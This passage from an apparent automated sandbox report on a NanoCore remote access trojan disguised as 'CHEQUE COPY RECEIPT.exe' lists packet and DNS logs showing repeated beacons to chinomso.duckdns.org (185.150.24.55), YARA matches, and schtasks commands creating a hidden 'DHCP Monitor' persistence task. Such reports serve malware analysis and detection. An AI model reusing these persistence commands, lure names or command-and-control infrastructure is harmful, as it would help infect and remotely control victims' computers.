Feb 22, 2021 08:19:43.778258085 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.778333902 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.778425932 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.801963091 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.813163042 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.813251972 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.822812080 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.849957943 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.850059986 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.859942913 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.879911900 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.879966974 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.880002975 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.894869089 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.894956112 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.913017035 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.933779001 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.933861017 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.944865942 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.963943958 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.964066982 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:43.994050980 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.999893904 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:43.999980927 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.540076017 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.549798012 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.549891949 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.562807083 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.587882996 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.588031054 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.591780901 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.608838081 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.608949900 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.618820906 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.635849953 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.635926008 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.663847923 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.671932936 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.672055006 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.678848982 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.695921898 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.696012974 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.716850996 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.735754967 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.735934019 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.770371914 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.770412922 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.770499945 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:44.794759989 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.820882082 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:44.821032047 CET	49751	7688	192.168.2.5	185.150.24.55
Feb 22, 2021 08:19:45.157011032 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:45.160204887 CET	7688	49751	185.150.24.55	192.168.2.5
Feb 22, 2021 08:19:45.160305023 CET	49751	7688	192.168.2.5	185.150.24.55

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 08:17:22.134579897 CET	54795	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:22.183362007 CET	53	54795	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:22.442053080 CET	49557	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:22.490895987 CET	53	49557	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:23.281652927 CET	61733	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:23.340257883 CET	53	61733	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:23.407079935 CET	65447	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:23.466945887 CET	53	65447	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:24.411298037 CET	52441	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:24.460033894 CET	53	52441	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:25.676701069 CET	62176	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:25.725311995 CET	53	62176	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:26.956404924 CET	59596	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:27.008919954 CET	53	59596	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:28.072738886 CET	65296	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:28.124762058 CET	53	65296	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:29.206775904 CET	63183	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:29.255872965 CET	53	63183	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:30.476876020 CET	60151	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:30.528435946 CET	53	60151	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:31.738868952 CET	56969	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:31.790415049 CET	53	56969	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:38.863929033 CET	55161	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:39.100116968 CET	53	55161	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:47.233830929 CET	54757	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:47.256659985 CET	49992	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:47.310930014 CET	53	54757	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:47.476897955 CET	53	49992	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:52.961039066 CET	60075	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:53.009493113 CET	53	60075	8.8.8.8	192.168.2.5
Feb 22, 2021 08:17:54.987055063 CET	55016	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:17:55.044329882 CET	53	55016	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:04.834829092 CET	64345	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:05.057965994 CET	53	64345	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:11.844405890 CET	57128	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:12.067183018 CET	53	57128	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:17.360019922 CET	54791	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:17.411580086 CET	53	54791	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:17.904686928 CET	50463	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:17.956314087 CET	53	50463	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:18.838238001 CET	50394	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:18.895183086 CET	53	50394	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:20.058625937 CET	58530	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:20.107664108 CET	53	58530	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:25.900965929 CET	53813	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:25.949713945 CET	53	53813	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:29.647058010 CET	63732	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:29.705430031 CET	53	63732	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:33.012712955 CET	57344	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:33.072130919 CET	53	57344	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:41.097594023 CET	54450	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:41.320753098 CET	53	54450	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:49.679960012 CET	59261	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:49.737011909 CET	53	59261	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:52.504312992 CET	57151	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:52.571548939 CET	53	57151	8.8.8.8	192.168.2.5
Feb 22, 2021 08:18:56.137552023 CET	59413	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:18:56.189614058 CET	53	59413	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:02.189659119 CET	60516	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:02.240247965 CET	53	60516	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:02.685960054 CET	51649	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:02.761513948 CET	53	51649	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:03.246107101 CET	65086	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:03.469477892 CET	53	65086	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:10.315064907 CET	56432	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:10.545476913 CET	53	56432	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:17.182197094 CET	52929	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:17.239420891 CET	53	52929	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:23.412548065 CET	64317	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:23.461144924 CET	53	64317	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:30.400455952 CET	61004	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:30.457623005 CET	53	61004	8.8.8.8	192.168.2.5
Feb 22, 2021 08:19:37.368788958 CET	56895	53	192.168.2.5	8.8.8.8
Feb 22, 2021 08:19:37.420080900 CET	53	56895	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 08:17:38.863929033 CET	192.168.2.5	8.8.8.8	0xf59b	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:17:47.256659985 CET	192.168.2.5	8.8.8.8	0xfd9f	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:17:54.987055063 CET	192.168.2.5	8.8.8.8	0xf4c6	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:04.834829092 CET	192.168.2.5	8.8.8.8	0x8551	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:11.844405890 CET	192.168.2.5	8.8.8.8	0x9106	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:18.838238001 CET	192.168.2.5	8.8.8.8	0x9699	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:25.900965929 CET	192.168.2.5	8.8.8.8	0x3cdb	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:33.012712955 CET	192.168.2.5	8.8.8.8	0xf9fb	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:41.097594023 CET	192.168.2.5	8.8.8.8	0xd6fb	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:49.679960012 CET	192.168.2.5	8.8.8.8	0xd3d0	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:56.137552023 CET	192.168.2.5	8.8.8.8	0x5303	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:03.246107101 CET	192.168.2.5	8.8.8.8	0xd06e	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:10.315064907 CET	192.168.2.5	8.8.8.8	0x128f	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:17.182197094 CET	192.168.2.5	8.8.8.8	0xe7c2	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:23.412548065 CET	192.168.2.5	8.8.8.8	0xbeb5	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:30.400455952 CET	192.168.2.5	8.8.8.8	0x94dc	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:37.368788958 CET	192.168.2.5	8.8.8.8	0xd468	Standard query (0)	chinomso.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 22, 2021 08:17:39.100116968 CET	8.8.8.8	192.168.2.5	0xf59b	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:17:47.476897955 CET	8.8.8.8	192.168.2.5	0xfd9f	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:17:55.044329882 CET	8.8.8.8	192.168.2.5	0xf4c6	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:05.057965994 CET	8.8.8.8	192.168.2.5	0x8551	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:12.067183018 CET	8.8.8.8	192.168.2.5	0x9106	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:18.895183086 CET	8.8.8.8	192.168.2.5	0x9699	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:25.949713945 CET	8.8.8.8	192.168.2.5	0x3cdb	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:33.072130919 CET	8.8.8.8	192.168.2.5	0xf9fb	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:41.320753098 CET	8.8.8.8	192.168.2.5	0xd6fb	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:49.737011909 CET	8.8.8.8	192.168.2.5	0xd3d0	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:18:56.189614058 CET	8.8.8.8	192.168.2.5	0x5303	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:03.469477892 CET	8.8.8.8	192.168.2.5	0xd06e	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:10.545476913 CET	8.8.8.8	192.168.2.5	0x128f	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:17.239420891 CET	8.8.8.8	192.168.2.5	0xe7c2	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:23.461144924 CET	8.8.8.8	192.168.2.5	0xbeb5	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:30.457623005 CET	8.8.8.8	192.168.2.5	0x94dc	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)
Feb 22, 2021 08:19:37.420080900 CET	8.8.8.8	192.168.2.5	0xd468	No error (0)	chinomso.duckdns.org	185.150.24.55	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 3888 Parent PID: 5580

General

Start time:	08:17:29
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe'
Imagebase:	0x400000
File size:	332470 bytes
MD5 hash:	403180100F3D966D4EA44C84D039A6D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 3060 Parent PID: 3888

General

Start time:	08:17:30
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe'
Imagebase:	0x400000
File size:	332470 bytes
MD5 hash:	403180100F3D966D4EA44C84D039A6D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.504663155.0000000003563000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.501596655.00000000024D1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 4616 Parent PID: 3060

General

Start time:	08:17:35
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp'
Imagebase:	0x1110000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6068 Parent PID: 4616

General

Start time:	08:17:35
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 5856 Parent PID: 3060

General

Start time:	08:17:36
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpEA6B.tmp'
Imagebase:	0x1110000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4600 Parent PID: 5856

General

Start time:	08:17:36
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff797770000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 5364 Parent PID: 904

General

Start time:	08:17:37
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0
Imagebase:	0x400000
File size:	332470 bytes
MD5 hash:	403180100F3D966D4EA44C84D039A6D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: dhcpmon.exe PID: 5312 Parent PID: 904

General

Start time:	08:17:38
Start date:	22/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x400000
File size:	332470 bytes
MD5 hash:	403180100F3D966D4EA44C84D039A6D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 25%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 1060 Parent PID: 5364

General

Start time:	08:17:39
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0
Imagebase:	0x400000
File size:	332470 bytes
MD5 hash:	403180100F3D966D4EA44C84D039A6D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.282706630.00000000022F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.282659839.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, 